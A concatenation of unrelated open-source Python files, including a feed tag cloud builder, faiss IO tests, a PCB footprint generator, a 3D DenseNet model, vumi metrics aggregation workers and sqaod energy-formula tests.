tags.append({'tagname':tagname, 'count':tagcount, 'weight':weight})
return tags
def cloudata(site):
""" Returns a dictionary with all the tag clouds related to a site.
"""
tagdata = fjlib.getquery("""
SELECT feedjack_post.feed_id, feedjack_tag.name, COUNT(*)
FROM feedjack_post, feedjack_subscriber, feedjack_tag,
feedjack_post_tags
WHERE feedjack_post.feed_id=feedjack_subscriber.feed_id AND
feedjack_post_tags.tag_id=feedjack_tag.id AND
feedjack_post_tags.post_id=feedjack_post.id AND
feedjack_subscriber.site_id=%d
GROUP BY feedjack_post.feed_id, feedjack_tag.name
ORDER BY feedjack_post.feed_id, feedjack_tag.name""" % site.id)
tagdict = {}
globaldict = {}
cloudict = {}
for feed_id, tagname, tagcount in tagdata:
if feed_id not in tagdict:
tagdict[feed_id] = []
tagdict[feed_id].append((tagname, tagcount))
try:
globaldict[tagname] += tagcount
except KeyError:
globaldict[tagname] = tagcount
tagdict[0] = globaldict.items()
for key, val in tagdict.items():
cloudict[key] = build(site, val)
return cloudict
def getcloud(site, feed_id=None):
""" Returns the tag cloud for a site or a site's subscriber.
"""
cloudict = fjcache.cache_get(site.id, 'tagclouds')
if not cloudict:
cloudict = cloudata(site)
fjcache.cache_set(site, 'tagclouds', cloudict)
# A subscriber's tag cloud has been requested.
if feed_id:
feed_id = int(feed_id)
if feed_id in cloudict:
return cloudict[feed_id]
return []
# The site tagcloud has been requested.
return cloudict[0]
#~
| StarcoderdataPython |
1733055 | from rest_framework import serializers
from core.models.insurer import Insurer
class InsurerSerializer(serializers.ModelSerializer):
class Meta:
model = Insurer
fields = ('id', 'name', 'is_active')
| StarcoderdataPython |
1634938 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#!/usr/bin/env python3
import numpy as np
import unittest
import faiss
import tempfile
import os
import io
import sys
import warnings
from multiprocessing.dummy import Pool as ThreadPool
from common import get_dataset, get_dataset_2
class TestIOVariants(unittest.TestCase):
def test_io_error(self):
d, n = 32, 1000
x = np.random.uniform(size=(n, d)).astype('float32')
index = faiss.IndexFlatL2(d)
index.add(x)
_, fname = tempfile.mkstemp()
try:
faiss.write_index(index, fname)
# should be fine
faiss.read_index(fname)
# now damage file
data = open(fname, 'rb').read()
data = data[:int(len(data) / 2)]
open(fname, 'wb').write(data)
# should make a nice readable exception that mentions the filename
try:
faiss.read_index(fname)
except RuntimeError as e:
if fname not in str(e):
raise
else:
raise
finally:
if os.path.exists(fname):
os.unlink(fname)
class TestCallbacks(unittest.TestCase):
def do_write_callback(self, bsz):
d, n = 32, 1000
x = np.random.uniform(size=(n, d)).astype('float32')
index = faiss.IndexFlatL2(d)
index.add(x)
f = io.BytesIO()
# test with small block size
writer = faiss.PyCallbackIOWriter(f.write, 1234)
if bsz > 0:
writer = faiss.BufferedIOWriter(writer, bsz)
faiss.write_index(index, writer)
del writer # make sure all writes committed
if sys.version_info[0] < 3:
buf = f.getvalue()
else:
buf = f.getbuffer()
index2 = faiss.deserialize_index(np.frombuffer(buf, dtype='uint8'))
self.assertEqual(index.d, index2.d)
self.assertTrue(np.all(
faiss.vector_to_array(index.xb) == faiss.vector_to_array(index2.xb)
))
# This is not a callable function: shoudl raise an exception
writer = faiss.PyCallbackIOWriter("blabla")
self.assertRaises(
Exception,
faiss.write_index, index, writer
)
def test_buf_read(self):
x = np.random.uniform(size=20)
_, fname = tempfile.mkstemp()
try:
x.tofile(fname)
f = open(fname, 'rb')
reader = faiss.PyCallbackIOReader(f.read, 1234)
bsz = 123
reader = faiss.BufferedIOReader(reader, bsz)
y = np.zeros_like(x)
print('nbytes=', y.nbytes)
reader(faiss.swig_ptr(y), y.nbytes, 1)
np.testing.assert_array_equal(x, y)
finally:
if os.path.exists(fname):
os.unlink(fname)
def do_read_callback(self, bsz):
d, n = 32, 1000
x = np.random.uniform(size=(n, d)).astype('float32')
index = faiss.IndexFlatL2(d)
index.add(x)
_, fname = tempfile.mkstemp()
try:
faiss.write_index(index, fname)
f = open(fname, 'rb')
reader = faiss.PyCallbackIOReader(f.read, 1234)
if bsz > 0:
reader = faiss.BufferedIOReader(reader, bsz)
index2 = faiss.read_index(reader)
self.assertEqual(index.d, index2.d)
np.testing.assert_array_equal(
faiss.vector_to_array(index.xb),
faiss.vector_to_array(index2.xb)
)
# This is not a callable function: should raise an exception
reader = faiss.PyCallbackIOReader("blabla")
self.assertRaises(
Exception,
faiss.read_index, reader
)
finally:
if os.path.exists(fname):
os.unlink(fname)
def test_write_callback(self):
self.do_write_callback(0)
def test_write_buffer(self):
self.do_write_callback(123)
self.do_write_callback(2345)
def test_read_callback(self):
self.do_read_callback(0)
def test_read_callback_buffered(self):
self.do_read_callback(123)
self.do_read_callback(12345)
def test_read_buffer(self):
d, n = 32, 1000
x = np.random.uniform(size=(n, d)).astype('float32')
index = faiss.IndexFlatL2(d)
index.add(x)
_, fname = tempfile.mkstemp()
try:
faiss.write_index(index, fname)
reader = faiss.BufferedIOReader(
faiss.FileIOReader(fname), 1234)
index2 = faiss.read_index(reader)
self.assertEqual(index.d, index2.d)
np.testing.assert_array_equal(
faiss.vector_to_array(index.xb),
faiss.vector_to_array(index2.xb)
)
finally:
if os.path.exists(fname):
os.unlink(fname)
def test_transfer_pipe(self):
""" transfer an index through a Unix pipe """
d, n = 32, 1000
x = np.random.uniform(size=(n, d)).astype('float32')
index = faiss.IndexFlatL2(d)
index.add(x)
Dref, Iref = index.search(x, 10)
rf, wf = os.pipe()
# start thread that will decompress the index
def index_from_pipe():
reader = faiss.PyCallbackIOReader(lambda size: os.read(rf, size))
return faiss.read_index(reader)
fut = ThreadPool(1).apply_async(index_from_pipe, ())
# write to pipe
writer = faiss.PyCallbackIOWriter(lambda b: os.write(wf, b))
faiss.write_index(index, writer)
index2 = fut.get()
# closing is not really useful but it does not hurt
os.close(wf)
os.close(rf)
Dnew, Inew = index2.search(x, 10)
np.testing.assert_array_equal(Iref, Inew)
np.testing.assert_array_equal(Dref, Dnew)
| StarcoderdataPython |
1636980 | import os
import sys
STRICTDOC_ROOT_PATH = os.path.abspath(
os.path.join(__file__, "../../../../strictdoc")
)
assert os.path.exists(STRICTDOC_ROOT_PATH), "does not exist: {}".format(
STRICTDOC_ROOT_PATH
)
sys.path.append(STRICTDOC_ROOT_PATH)
| StarcoderdataPython |
159493 | <reponame>NiceCircuits/pcbLibraryManager<filename>src/pcbLibraryManager/footprints/footprintSmdQuad.py
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 3 06:52:50 2015
@author: piotr at nicecircuits.com
"""
from libraryManager.footprint import footprint
from libraryManager.footprintPrimitive import *
from libraryManager.defaults import defaults
from libraryManager.common import *
class footprintSmdQuad(footprint):
"""
Footprint generator for quad SMD packages.
"""
def __init__(self, name, alternativeLibName, pinCount, pitch, padSpan, padDimensions,
bodyDimensions, court, leadDimensions=None, lead="gullwing", offset = [0, 0], originMarkSize=-1):
if originMarkSize<0:
originMarkSize = min(defaults.originMarkSize, bodyDimensions[0]*0.3, bodyDimensions[1]*0.3)
super().__init__(name, alternativeLibName=alternativeLibName, originMarkSize=originMarkSize)
# pads, leads
y1 = pitch * (pinCount/8 - 0.5)
for side in range(4):
for y in range(int(pinCount/4)):
pos = translatePoints(rotatePoints([[-padSpan[0]/2, y1-pitch*y]], side*90), offset)[0]
self.primitives.append(pcbSmtPad(pcbLayer.topCopper, position=pos,\
dimensions=padDimensions, name=str(int(y+1+side*pinCount/4)),\
rotation=side*90))
if leadDimensions:
self.addLead(rotatePoints(\
[[(-bodyDimensions[side%2]/2-leadDimensions[0]/2), y1-pitch*y]], side*90)[0],\
leadDimensions, rotation=side*90+180, lead=lead)
# body
self.addSimple3Dbody([0,0], bodyDimensions)
#first pad marker
pos=rotatePoint(scalePoint(bodyDimensions[0:2], 0.4),90)+[bodyDimensions[2]-0.05]
radius = min(bodyDimensions[0]*0.05, bodyDimensions[1]*0.05, 0.5)
self.addCylinder3Dbody(pos,[radius,radius,0.1],draw=True, file="cylinder_metal")
# first pad marker - silk
pos = [-padSpan[0]/2,padSpan[1]/2]
radius=padDimensions[0]/2
self.primitives.append(pcbCircle(pcbLayer.topSilk,defaults.silkWidth,\
pos,radius))
# courtyard
self.addCourtyardAndSilk([s+max(padDimensions) for s in padSpan], court)
# texts
if originMarkSize:
y = originMarkSize + defaults.documentationTextHeight
self.nameObject.position=[0,y]
self.valueObject.position=[0,-y]
class footprintQfpParametrized(footprintSmdQuad):
"""
"""
def __init__(self, params, mechanical, footprint, variant, lead="gullwing",
alternativeLibName=""):
"""
Take parameters from excel file via icGenerator
"""
name="%s_%s" % (params["Name"], variant)
if not alternativeLibName:
alternativeLibName="niceSemiconductors"
fp = footprint[variant]
mech=mechanical["Max"]
super().__init__(name, alternativeLibName,\
pinCount=params["Pins"],\
pitch=mechanical["Typ"]["e"],\
padSpan=[fp["C"], fp["C"]],\
padDimensions=[fp["Y"],fp["X"]],\
bodyDimensions=[mech["D1"], mech["E1"], mech["A"]],\
court = fp["Court"],\
leadDimensions=[(mech["E"]-mech["E1"])/2, mech["b"], mech["A"]*0.6],\
lead=lead)
class footprintQfnParametrized(footprintQfpParametrized):
"""
"""
def __init__(self, params, mechanical, footprint, variant, alternativeLibName=""):
"""
Take parameters from excel file via icGenerator
"""
super().__init__(params, mechanical, footprint, variant, lead="cube_metal",\
alternativeLibName="")
class footprintQfp(footprintSmdQuad):
"""
QFP (0.5, 0.65, 0.8, 1.0mm pitch). Based on Atmel datasheets.
"""
def __init__(self, pinCount, pitch, name="", alternativeLibName="", density="N"):
if not name:
name="QFP-%d-%1.1f_%s"%(pinCount, pitch, density)
if not alternativeLibName:
alternativeLibName="niceSemiconductors"
bodyDimensions={0.5:{32:[5.1,5.1, 1.2], 48:[7.1,7.1, 1.2], 64:[10.1,10.1, 1.2], 80:[12.1,12.1, 1.2],\
100:[14.1,14.1, 1.2], 144:[20.1, 20.1, 1.2], 176:[24.1,24.1, 1.2], 208:[28.1, 28.1, 1.2],},\
0.65:{20:[4.1,4.1, 1.2], 40:[7.1, 7.1, 1.2], 52:[10.1, 10.1, 1.2], 64:[12.1, 12.1, 1.2],\
80:[14.1,14.1, 1.2], 112:[20.1,20.1, 1.2], 160:[28,28, 1.2]},\
0.8:{32:[7.1,7.1, 1.2], 44:[10.1,10.1, 1.2], 52:[12.1,12.1, 1.2], 64:[14.1,14.1, 1.2]},\
1.0:{36:[10.1,10.1, 1.2], 44:[12.1,12.1, 1.2], 52:[14.1,14.1, 1.2]}}
leadDimensions={0.5:[1,0.27, 0.6], 0.65:[1, 0.38, 0.6], 0.8:[1,0.45, 0.6], 1.0:[1, 0.5, 0.6]}
padSpan={0.5:{48:{"L":[8.4, 8.4], "N":[8.4, 8.4], "M":[8.4, 8.4]},\
64:{"L":[11.4, 11.4], "N":[11.4, 11.4], "M":[11.4, 11.4]},\
100:{"L":[15.4, 15.4], "N":[15.4, 15.4], "M":[15.4, 15.4]}},\
0.65:{80:{"L":[15.4, 15.4], "N":[15.4, 15.4], "M":[15.4, 15.4]}},\
0.8:{32:{"L":[8.4, 8.4], "N":[8.4, 8.4], "M":[8.4, 8.4]},\
44:{"L":[11.4, 11.4], "N":[11.4, 11.4], "M":[11.4, 11.4]},\
64:{"L":[15.4, 15.4], "N":[15.4, 15.4], "M":[15.4, 15.4]}}}
padDimensions={0.5:{"L":[1.5, 0.3], "N":[1.5, 0.3], "M":[1.5, 0.3]},\
0.65:{"L":[1.5, 0.45], "N":[1.5, 0.45], "M":[1.5, 0.45]},\
0.8:{"L":[1.5,0.55], "N":[1.5,0.55], "M":[1.5,0.55]}}
super().__init__(name, alternativeLibName, pinCount=pinCount, pitch=pitch,\
padSpan=padSpan[pitch][pinCount][density],\
padDimensions=padDimensions[pitch][density],\
bodyDimensions=bodyDimensions[pitch][pinCount], court = defaults.court[density],\
leadDimensions=leadDimensions[pitch])
| StarcoderdataPython |
3337593 | mff_auto = "0.9.5"
mff = "7.5.1"
updater = "1.1.0"
| StarcoderdataPython |
77215 | import torch
import torch.nn as nn
# from torchsummary import summary
# from lib.medzoo.BaseModelClass import BaseModel
"""
Implementation od DenseVoxelNet based on https://arxiv.org/abs/1708.00573
Hyperparameters used:
batch size = 3
weight decay = 0.0005
momentum = 0.9
lr = 0.05
"""
def init_weights(m):
"""
The weights were randomly initialized with a Gaussian distribution (µ = 0, σ = 0.01)
"""
torch.seed(777) # for reproducibility
classname = m.__class__.__name__
if classname.find('Conv') != -1 or classname.find('BatchNorm') != -1:
m.weight.data.normal_(0.00, 0.01)
class DenseLayer(nn.Sequential):
def __init__(self, num_input_features, growth_rate, bn_size, drop_rate=0.2):
super(DenseLayer, self).__init__()
self.add_module('norm1', nn.BatchNorm3d(num_input_features)),
self.add_module('relu1', nn.LeakyReLU(0.1, inplace=True)),
self.add_module('conv1', nn.Conv3d(num_input_features, bn_size *
growth_rate, kernel_size=3, stride=1, padding=1, bias=False)),
self.drop_rate = drop_rate
if self.drop_rate > 0:
self.drop_layer = nn.Dropout(p=self.drop_rate)
def forward(self, x):
new_features = super(DenseLayer, self).forward(x)
if self.drop_rate > 0:
new_features = self.drop_layer(new_features)
return torch.cat([x, new_features], 1)
class DenseBlock(nn.Sequential):
"""
to keep the spatial dims o=i, this formula is applied
o = [i + 2*p - k - (k-1)*(d-1)]/s + 1
"""
def __init__(self, num_layers, num_input_features, bn_size, growth_rate, drop_rate=0.2):
super(DenseBlock, self).__init__()
for i in range(num_layers):
layer = DenseLayer(num_input_features + i * growth_rate, growth_rate, bn_size, drop_rate)
self.add_module('denselayer%d' % (i + 1), layer)
class Transition(nn.Module):
def __init__(self, num_input_features, num_output_features):
super(Transition, self).__init__()
norm = nn.BatchNorm3d(num_input_features)
relu = nn.LeakyReLU(0.1, inplace=True)
conv3d = nn.Conv3d(num_input_features, num_output_features,
kernel_size=1, padding=0, stride=1)
self.conv = nn.Sequential(norm, relu, conv3d)
self.max_pool = nn.MaxPool3d(kernel_size=2, stride=2)
def forward(self, x):
k = self.conv(x)
y = self.max_pool(k)
return y, k
class Upsampling(nn.Sequential):
"""
For transpose conv
o = output, p = padding, k = kernel_size, s = stride, d = dilation
o = (i -1)*s - 2*p + k + output_padding = (i-1)*2 +2 = 2*i
"""
def __init__(self, input_features, out_features):
super(Upsampling, self).__init__()
self.tr_conv1_features = 128 # defined in the paper
self.tr_conv2_features = out_features
self.add_module('norm', nn.BatchNorm3d(input_features))
self.add_module('relu', nn.LeakyReLU(0.1, inplace=True))
self.add_module('conv', nn.Conv3d(input_features, input_features,
kernel_size=1, stride=1, padding=0, bias=False))
# Transposed convolutions must be un-padded?
self.add_module('transp_conv_1',
nn.ConvTranspose3d(input_features, self.tr_conv1_features, kernel_size=2, padding=0,
output_padding=0, stride=2))
self.add_module('transp_conv_2',
nn.ConvTranspose3d(self.tr_conv1_features, self.tr_conv2_features, kernel_size=2, padding=0,
output_padding=0, stride=2))
| StarcoderdataPython |
20431 | # -*- test-case-name: vumi.blinkenlights.tests.test_metrics_workers -*-
import time
import random
import hashlib
from datetime import datetime
from twisted.python import log
from twisted.internet.defer import inlineCallbacks, Deferred
from twisted.internet import reactor
from twisted.internet.task import LoopingCall
from twisted.internet.protocol import DatagramProtocol
from vumi.service import Consumer, Publisher, Worker
from vumi.blinkenlights.metrics import (MetricsConsumer, MetricManager, Count,
Metric, Timer, Aggregator)
from vumi.blinkenlights.message20110818 import MetricMessage
class AggregatedMetricConsumer(Consumer):
"""Consumer for aggregate metrics.
Parameters
----------
callback : function (metric_name, values)
Called for each metric datapoint as it arrives. The
parameters are metric_name (str) and values (a list of
timestamp and value pairs).
"""
exchange_name = "vumi.metrics.aggregates"
exchange_type = "direct"
durable = True
routing_key = "vumi.metrics.aggregates"
def __init__(self, callback):
self.queue_name = self.routing_key
self.callback = callback
def consume_message(self, vumi_message):
msg = MetricMessage.from_dict(vumi_message.payload)
for metric_name, _aggregators, values in msg.datapoints():
self.callback(metric_name, values)
class AggregatedMetricPublisher(Publisher):
"""Publishes aggregated metrics.
"""
exchange_name = "vumi.metrics.aggregates"
exchange_type = "direct"
durable = True
routing_key = "vumi.metrics.aggregates"
def publish_aggregate(self, metric_name, timestamp, value):
# TODO: perhaps change interface to publish multiple metrics?
msg = MetricMessage()
msg.append((metric_name, (), [(timestamp, value)]))
self.publish_message(msg)
class TimeBucketConsumer(Consumer):
"""Consume time bucketed metric messages.
Parameters
----------
bucket : int
Bucket to consume time buckets from.
callback : function, f(metric_name, aggregators, values)
Called for each metric datapoint as it arrives.
The parameters are metric_name (str),
aggregator (list of aggregator names) and values (a
list of timestamp and value pairs).
"""
exchange_name = "vumi.metrics.buckets"
exchange_type = "direct"
durable = True
ROUTING_KEY_TEMPLATE = "bucket.%d"
def __init__(self, bucket, callback):
self.queue_name = self.ROUTING_KEY_TEMPLATE % bucket
self.routing_key = self.queue_name
self.callback = callback
def consume_message(self, vumi_message):
msg = MetricMessage.from_dict(vumi_message.payload)
for metric_name, aggregators, values in msg.datapoints():
self.callback(metric_name, aggregators, values)
class TimeBucketPublisher(Publisher):
"""Publish time bucketed metric messages.
Parameters
----------
buckets : int
Total number of buckets messages are being
distributed to.
bucket_size : int, in seconds
Size of each time bucket in seconds.
"""
exchange_name = "vumi.metrics.buckets"
exchange_type = "direct"
durable = True
ROUTING_KEY_TEMPLATE = "bucket.%d"
def __init__(self, buckets, bucket_size):
self.buckets = buckets
self.bucket_size = bucket_size
def find_bucket(self, metric_name, ts_key):
md5 = hashlib.md5("%s:%d" % (metric_name, ts_key))
return int(md5.hexdigest(), 16) % self.buckets
def publish_metric(self, metric_name, aggregates, values):
timestamp_buckets = {}
for timestamp, value in values:
ts_key = int(timestamp) / self.bucket_size
ts_bucket = timestamp_buckets.get(ts_key)
if ts_bucket is None:
ts_bucket = timestamp_buckets[ts_key] = []
ts_bucket.append((timestamp, value))
for ts_key, ts_bucket in timestamp_buckets.iteritems():
bucket = self.find_bucket(metric_name, ts_key)
routing_key = self.ROUTING_KEY_TEMPLATE % bucket
msg = MetricMessage()
msg.append((metric_name, aggregates, ts_bucket))
self.publish_message(msg, routing_key=routing_key)
class MetricTimeBucket(Worker):
"""Gathers metrics messages and redistributes them to aggregators.
:class:`MetricTimeBuckets` take metrics from the vumi.metrics
exchange and redistribute them to one of N :class:`MetricAggregator`
workers.
There can be any number of :class:`MetricTimeBucket` workers.
Configuration Values
--------------------
buckets : int (N)
The total number of aggregator workers. :class:`MetricAggregator`
workers must be started with bucket numbers 0 to N-1 otherwise
metric data will go missing (or at best be stuck in a queue
somewhere).
bucket_size : int, in seconds
The amount of time each time bucket represents.
"""
@inlineCallbacks
def startWorker(self):
log.msg("Starting a MetricTimeBucket with config: %s" % self.config)
buckets = int(self.config.get("buckets"))
log.msg("Total number of buckets %d" % buckets)
bucket_size = int(self.config.get("bucket_size"))
log.msg("Bucket size is %d seconds" % bucket_size)
self.publisher = yield self.start_publisher(TimeBucketPublisher,
buckets, bucket_size)
self.consumer = yield self.start_consumer(MetricsConsumer,
self.publisher.publish_metric)
class DiscardedMetricError(Exception):
pass
class MetricAggregator(Worker):
"""Gathers a subset of metrics and aggregates them.
:class:`MetricAggregators` work in sets of N.
Configuration Values
--------------------
bucket : int, 0 to N-1
An aggregator needs to know which number out of N it is. This is
its bucket number.
bucket_size : int, in seconds
The amount of time each time bucket represents.
lag : int, seconds, optional
The number of seconds after a bucket's time ends to wait
before processing the bucket. Default is 5s.
"""
_time = time.time # hook for faking time in tests
def _ts_key(self, time):
return int(time) / self.bucket_size
@inlineCallbacks
def startWorker(self):
log.msg("Starting a MetricAggregator with config: %s" % self.config)
bucket = int(self.config.get("bucket"))
log.msg("MetricAggregator bucket %d" % bucket)
self.bucket_size = int(self.config.get("bucket_size"))
log.msg("Bucket size is %d seconds" % self.bucket_size)
self.lag = float(self.config.get("lag", 5.0))
# ts_key -> { metric_name -> (aggregate_set, values) }
# values is a list of (timestamp, value) pairs
self.buckets = {}
# initialize last processed bucket
self._last_ts_key = self._ts_key(self._time() - self.lag) - 2
self.publisher = yield self.start_publisher(AggregatedMetricPublisher)
self.consumer = yield self.start_consumer(TimeBucketConsumer,
bucket, self.consume_metric)
self._task = LoopingCall(self.check_buckets)
done = self._task.start(self.bucket_size, False)
done.addErrback(lambda failure: log.err(failure,
"MetricAggregator bucket checking task died"))
def check_buckets(self):
"""Periodically clean out old buckets and calculate aggregates."""
# key for previous bucket
current_ts_key = self._ts_key(self._time() - self.lag) - 1
for ts_key in self.buckets.keys():
if ts_key <= self._last_ts_key:
log.err(DiscardedMetricError("Throwing way old metric data: %r"
% self.buckets[ts_key]))
del self.buckets[ts_key]
elif ts_key <= current_ts_key:
aggregates = []
ts = ts_key * self.bucket_size
items = self.buckets[ts_key].iteritems()
for metric_name, (agg_set, values) in items:
for agg_name in agg_set:
agg_metric = "%s.%s" % (metric_name, agg_name)
agg_func = Aggregator.from_name(agg_name)
agg_value = agg_func([v[1] for v in values])
aggregates.append((agg_metric, agg_value))
for agg_metric, agg_value in aggregates:
self.publisher.publish_aggregate(agg_metric, ts,
agg_value)
del self.buckets[ts_key]
self._last_ts_key = current_ts_key
def consume_metric(self, metric_name, aggregates, values):
if not values:
return
ts_key = self._ts_key(values[0][0])
metrics = self.buckets.get(ts_key, None)
if metrics is None:
metrics = self.buckets[ts_key] = {}
metric = metrics.get(metric_name)
if metric is None:
metric = metrics[metric_name] = (set(), [])
existing_aggregates, existing_values = metric
existing_aggregates.update(aggregates)
existing_values.extend(values)
def stopWorker(self):
self._task.stop()
self.check_buckets()
class MetricsCollectorWorker(Worker):
@inlineCallbacks
def startWorker(self):
log.msg("Starting %s with config: %s" % (
type(self).__name__, self.config))
yield self.setup_worker()
self.consumer = yield self.start_consumer(
AggregatedMetricConsumer, self.consume_metrics)
def stopWorker(self):
log.msg("Stopping %s" % (type(self).__name__,))
return self.teardown_worker()
def setup_worker(self):
pass
def teardown_worker(self):
pass
def consume_metrics(self, metric_name, values):
raise NotImplementedError()
class GraphitePublisher(Publisher):
"""Publisher for sending messages to Graphite."""
exchange_name = "graphite"
exchange_type = "topic"
durable = True
auto_delete = False
delivery_mode = 2
require_bind = False # Graphite uses a topic exchange
def publish_metric(self, metric, value, timestamp):
self.publish_raw("%f %d" % (value, timestamp), routing_key=metric)
class GraphiteMetricsCollector(MetricsCollectorWorker):
"""Worker that collects Vumi metrics and publishes them to Graphite."""
@inlineCallbacks
def setup_worker(self):
self.graphite_publisher = yield self.start_publisher(GraphitePublisher)
def consume_metrics(self, metric_name, values):
for timestamp, value in values:
self.graphite_publisher.publish_metric(
metric_name, value, timestamp)
class UDPMetricsProtocol(DatagramProtocol):
def __init__(self, ip, port):
# NOTE: `host` must be an IP, not a hostname.
self._ip = ip
self._port = port
def startProtocol(self):
self.transport.connect(self._ip, self._port)
def send_metric(self, metric_string):
return self.transport.write(metric_string)
class UDPMetricsCollector(MetricsCollectorWorker):
"""Worker that collects Vumi metrics and publishes them over UDP."""
DEFAULT_FORMAT_STRING = '%(timestamp)s %(metric_name)s %(value)s\n'
DEFAULT_TIMESTAMP_FORMAT = '%Y-%m-%d %H:%M:%S%z'
@inlineCallbacks
def setup_worker(self):
self.format_string = self.config.get(
'format_string', self.DEFAULT_FORMAT_STRING)
self.timestamp_format = self.config.get(
'timestamp_format', self.DEFAULT_TIMESTAMP_FORMAT)
self.metrics_ip = yield reactor.resolve(self.config['metrics_host'])
self.metrics_port = int(self.config['metrics_port'])
self.metrics_protocol = UDPMetricsProtocol(
self.metrics_ip, self.metrics_port)
self.listener = yield reactor.listenUDP(0, self.metrics_protocol)
def teardown_worker(self):
return self.listener.stopListening()
def consume_metrics(self, metric_name, values):
for timestamp, value in values:
timestamp = datetime.utcfromtimestamp(timestamp)
metric_string = self.format_string % {
'timestamp': timestamp.strftime(self.timestamp_format),
'metric_name': metric_name,
'value': value,
}
self.metrics_protocol.send_metric(metric_string)
class RandomMetricsGenerator(Worker):
"""Worker that publishes a set of random metrics.
Useful for tests and demonstrations.
Configuration Values
--------------------
manager_period : float in seconds, optional
How often to have the internal metric manager send metrics
messages. Default is 5s.
generator_period: float in seconds, optional
How often the random metric loop should send values to the
metric manager. Default is 1s.
"""
# callback for tests, f(worker)
# (or anyone else that wants to be notified when metrics are generated)
on_run = None
@inlineCallbacks
def startWorker(self):
log.msg("Starting the MetricsGenerator with config: %s" % self.config)
manager_period = float(self.config.get("manager_period", 5.0))
log.msg("MetricManager will sent metrics every %s seconds" %
manager_period)
generator_period = float(self.config.get("generator_period", 1.0))
log.msg("Random metrics values will be generated every %s seconds" %
generator_period)
self.mm = yield self.start_publisher(MetricManager, "vumi.random.",
manager_period)
self.counter = self.mm.register(Count("count"))
self.value = self.mm.register(Metric("value"))
self.timer = self.mm.register(Timer("timer"))
self.next = Deferred()
self.task = LoopingCall(self.run)
self.task.start(generator_period)
@inlineCallbacks
def run(self):
if random.choice([True, False]):
self.counter.inc()
self.value.set(random.normalvariate(2.0, 0.1))
with self.timer:
d = Deferred()
wait = random.uniform(0.0, 0.1)
reactor.callLater(wait, lambda: d.callback(None))
yield d
if self.on_run is not None:
self.on_run(self)
def stopWorker(self):
self.mm.stop()
self.task.stop()
log.msg("Stopping the MetricsGenerator")
| StarcoderdataPython |
140233 | <reponame>knownstranger03/Human_Pose_Estimation
from keras.preprocessing.image import ImageDataGenerator
import numpy as np, pandas as pd, sklearn
from sklearn.preprocessing import OneHotEncoder
from sklearn.model_selection import train_test_split
def prep():
generator=ImageDataGenerator(validation_split=0.10)
train_df=pd.read_csv('../Data/Pose_Dataset/train_joints_coords.csv', header=None)
test_df=pd.read_csv('../Data/Pose_Dataset/test_joints_coords.csv', header=None)
train_img='../Data/Pose_Dataset/train/'
test_img='../Data/Pose_Dataset/test/'
train=generator.flow_from_dataframe(train_df, directory=train_img, batch_size=40,
target_size=(224, 224), x_col=0,
y_col=list(np.arange(1,15,1)), class_mode= 'raw',
subset="training")
valid=generator.flow_from_dataframe(train_df, directory=train_img, batch_size=40,
target_size=(224, 224), x_col=0,
y_col=list(np.arange(1,15,1)), class_mode= 'raw',
subset="validation")
generator=ImageDataGenerator()
test = generator.flow_from_dataframe(test_df, directory=test_img, x_col=0,
y_col=list(np.arange(1,15,1)), class_mode= 'raw',
target_size= (224,224), batch_size=40)
print("Reading Data...")
return train, valid, test
def prep2():
#Importing Action Joints Dataset
df = pd.read_csv('../Data/Action_Dataset/action_joints.csv')
df.columns= list(range(df.shape[1]))
x=df.iloc[:, 1:-1]
y=df.iloc[:, -1].values.reshape(-1,1)
enc= OneHotEncoder()
y= enc.fit_transform(y).toarray()
x_train, x_val, y_train, y_val = train_test_split(x,y, test_size= 0.1)
return x_train, y_train, x_val, y_val, enc
| StarcoderdataPython |
3315578 | <gh_stars>10-100
from __future__ import print_function
import unittest
import numpy as np
import sqaod as sq
import sqaod.common as common
from .example_problems import *
class TestDenseGraphFormulasBase :
def __init__(self, pkg, dtype) :
self.pkg = pkg
self.dtype = dtype
self.epu = 1.e-6 if dtype == np.float32 else 1.e-12
def new_W(self, N) :
return common.generate_random_symmetric_W((N), dtype=np.float64)
def test_engery_with_zero_x(self):
N = 8
W = self.new_W(N)
x = np.zeros(N, np.int8)
Equbo = self.pkg.formulas.dense_graph_calculate_E(W, x, self.dtype)
self.assertEqual(Equbo, 0.)
def test_engery_with_one_x(self):
N = 8
W = self.new_W(N)
x = np.ones(N, np.int8)
Equbo = self.pkg.formulas.dense_graph_calculate_E(W, x, self.dtype)
self.assertTrue(np.allclose(Equbo, np.sum(W)))
def test_engery(self):
N = 8
W = self.new_W(N)
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Ebatched = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
E = np.ones((2 ** N))
for i in range(0, 2 ** N) :
E[i] = self.pkg.formulas.dense_graph_calculate_E(W, xlist[i], self.dtype)
self.assertTrue(np.allclose(Ebatched, E, atol=self.epu))
def test_energy_batch_1(self):
N = 8
W = self.new_W(N)
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Ebatched = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
E = np.empty((2 ** N))
for i in range(0, 2 ** N) :
E[i] = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist[i], self.dtype)[0]
self.assertTrue(np.allclose(Ebatched, E, atol=self.epu))
def test_hamiltonian_energy(self):
N = 8
W = common.generate_random_symmetric_W((N), dtype=np.float64)
h, J, c = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
# identity
self.assertTrue(np.allclose(0., - np.sum(h) + np.sum(J) + c, atol=self.epu))
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
for idx in range(0, 2 ** N) :
x = xlist[idx]
Equbo = self.pkg.formulas.dense_graph_calculate_E(W, x, self.dtype)
q = 2 * x - 1
Eising = self.pkg.formulas.dense_graph_calculate_E_from_spin(h, J, c, q, self.dtype)
self.assertTrue(np.allclose(Equbo, Eising, atol=self.epu))
def test_hamiltonian_energy_batched(self):
N = 8
W = common.generate_random_symmetric_W((N), dtype=np.float64)
h, J, c = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
# identity
self.assertTrue(np.allclose(0., - np.sum(h) + np.sum(J) + c, atol=self.epu))
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Equbo = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
qlist = 2 * xlist - 1
Eising = sq.py.formulas.dense_graph_batch_calculate_E_from_spin(h, J, c, qlist, self.dtype)
self.assertTrue(np.allclose(Equbo, Eising, atol=self.epu))
# Tests for py.formulas
